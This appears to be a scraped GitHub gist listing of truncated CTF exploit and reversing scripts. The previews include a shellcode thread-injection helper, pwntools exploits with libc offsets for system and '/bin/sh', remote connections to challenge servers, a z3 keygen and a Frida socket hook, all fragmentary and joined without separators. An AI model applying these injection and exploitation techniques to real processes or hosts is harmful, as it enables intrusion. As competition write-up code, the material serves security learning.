

#include <Windows.h>
/* Signature of the "GetFlag" export that main() resolves from the DLL at
   run time via GetProcAddress(). */
typedef DWORD (__cdecl *_GetFlag)();
/* Resolved export; main() calls it without checking for a NULL result. */
_GetFlag GetFlag;
/* Module handle from LoadLibrary(). main() loads the DLL by bare file name,
   so it is located through the normal DLL search order rather than a fixed
   path, and the handle goes to GetProcAddress() without a NULL check, so a
   failed load is not reported. */
HMODULE hDll = NULL;
NTSTATUS main(int argc, char **argv) {
hDll = LoadLibrary("my_head_flew_away_patched.dll");
GetFlag = (_GetFlag)GetProcAddress(hDll, "GetFlag");
GetFlag();
from z3 import *
import sys
# Login name taken from the command line; there is no argument-count check,
# so running without an argument raises IndexError here.
login = sys.argv[1]
# First two and last two characters of the login, concatenated. For a login
# shorter than four characters the two slices overlap and repeat characters.
start_end_two = login[:2]+login[-2:]
# Sum of the byte values of every character of the login.
asciiSum = sum(map(ord,login))
# Python 2 only: str.encode('hex') does not exist on Python 3 (binascii.hexlify
# / bytes.hex there). The four edge characters are read as one big-endian
# integer and XORed with the constant and the byte sum.
magicValueLogin = 0xfec0135a ^ int(start_end_two.encode('hex'), 16) ^ asciiSum
# 64-bit symbolic values for the z3 solver; the constraints relating them are
# presumably added further down, outside this preview.
password = BitVec("password",64)
magicValuePass = BitVec("magicValuePass",64)
sudhackar / inject.py
Created September 29, 2017 17:00
Inject a thread running your shellcode into a process
def InjectTo(proc_name):
dwDesiredAccess = 0x1f0fff # PROCESS_ALL_ACCESS
dwProcessId = GetPid(proc_name)
if not dwProcessId:
debug_print("\t[-] No such process")
hProcess = kernel32.OpenProcess(dwDesiredAccess, False, dwProcessId)
if hProcess == 0:
debug_print("\t[-] Failed to get a handle to : %s" % (proc_name))
sudhackar / srop.py
Created September 27, 2017 14:48
[Backdoor CTF 2017] SROP
from pwn import *
# pwntools target settings: x86-64 Linux binary, info-level logging.
context(arch='amd64', os='linux', log_level='info')
# Bare string literal kept as an in-file note (it is not the module docstring,
# since it is not the first statement in the file).
'''
Syscall# Param 1 Param 2 Param 3 Param 4 Param 5 Param 6
rax rdi rsi rdx r10 r8 r9
we make a write(STDOUT, *flag, len(flag))
'''
sudhackar / crypto350.py
Created September 17, 2017 20:09
[CSAW CTF 2017] solution scripts for pwn and crypto
from pwn import *
# pwntools log verbosity.
context(log_level='info')
# Module-level connection to the challenge service, opened as a side effect of
# importing/running the script; presumably passed to send_blob() below.
s = remote('crypto.chal.csaw.io',1578)
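def send_blob(s, data):
    """Answer one prompt on the challenge connection.

    Waits until the remote side has sent a ``': '`` prompt, then sends
    *data* followed by a newline and echoes the sent value to stdout.

    Args:
        s: a pwntools tube (e.g. ``remote``) exposing ``recvuntil`` and
            ``sendline``.
        data: the line to send, without its trailing newline.

    Returns:
        None.
    """
    s.recvuntil(': ')
    s.sendline(data)
    # One pre-formatted string so the output is identical on Python 2 and 3;
    # the original ``print "sent", data`` statement is Python-2-only syntax.
    print("sent %s" % data)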
sudhackar / frida-socket.js
Last active June 5, 2024 02:42
frida socket hook
'use strict';
// Native handle to the process's connect() export, presumably so the
// replacement callback installed below can forward to the real
// implementation (the callback body is outside this preview).
// findExportByName(null, ...) searches every loaded module and returns null
// when the export is absent; NativeFunction would then throw at construction.
// Note the replacement's log prints the raw sockaddr pointer, not a decoded
// address.
var connect = new NativeFunction(
    Module.findExportByName(null, "connect"),
    'int',                      // return type
    ['int', 'pointer', 'int']   // (sockfd, sockaddr *, addrlen)
);
Interceptor.replace(connect, new NativeCallback(function (sockfd, addr, addrlen) {
console.log(sockfd, addr, addrlen);
sudhackar / rhme3-whitebox.py
Last active November 14, 2018 19:59
RHME3 CTF whitebox implementation in pure Python
dword_6661C0 = [1649885203,594050925,1581470779,-1391327847,-1611275700,-1912869808,-599971129,495688880,1480676927,-2013402532,-909651928,1320857042,210015150,-1192689802,-1425012835,-232312589,-1239741301,-1142292876,-1036574509,-1996951722,-198888713,-450216471,1280137767,8427430,-1995564639,-1761340491,731483796,1029862777,1380405299,2024325110,627735913,1179343915,-700764981,1404151492,1721939426,1016365966,-86589174,1705227488,-1290268787,-1495075486,92509344,-1091895950,-2046092117,695105889,1985694731,865175172,-549704763,966230152,543784559,-1108607888,1683309079,1220063190,1464095541,681086870,-1511787424,-2146885969,242443355,-153959166,58824356,-1861873231,-1661672626,-1762466494,41377875,-1595869338,1413829175,-1978722141,580815258,-433373973,159879336,311335354,125068117,1246713891,-1138947449,344759230,1078550063,2086488583,996177789,-607527372,2007874300,462003892,444557379,1153215454,377187403,765168784,-382846495,1621145574,-48089607,1203612380,2125118962,1103079640,1968852233,-751292467,564
sudhackar / rhme3-exp.py
Last active February 19, 2019 06:39
rhme3 CTF exploitation on heap
from pwn import *
# pwntools target settings: x86-64 Linux binary, info-level logging.
context(arch='amd64', os='linux', log_level='info')
# Hard-coded addresses/offsets tied to one specific libc build and binary
# layout (names only; how they are used is outside this preview). They are
# not valid against any other build.
system_main_arena_offset = 0x37f7e8
got_strlen = 0x603040
# Module-level connection to the challenge service, opened as a side effect
# of running the script.
s = remote("pwn.rhme.riscure.com",1337)
def recv_menu():
    """Consume the service's output up to the next ``': '`` prompt.

    Reads from the module-level connection ``s``; the received bytes are
    discarded. NOTE(review): the gist preview may cut this function short --
    confirm against the full file.
    """
    s.recvuntil(": ")
game = """
.....1...1
1......0..
..0....0..
.00...0..1
1........1
...0..1...
0....1....
.......0.0
0........0
sudhackar / maze.py
Created April 27, 2017 03:52
bof on get_input()
from pwn import *
# Symbol offsets for one specific libc build (names follow the libc symbols
# they refer to); they are only valid against that exact library. The base
# they are combined with is not in this preview.
offset___libc_start_main = 0x0000000000020740
offset_system = 0x0000000000045390
offset_dup2 = 0x00000000000f6d90
offset_read = 0x00000000000f6670
offset_write = 0x00000000000f66d0
offset_str_bin_sh = 0x18c177
# Presumably an address in the target binary's .bss section (name only) --
# confirm against the binary.
bss = 0x00000000000130b8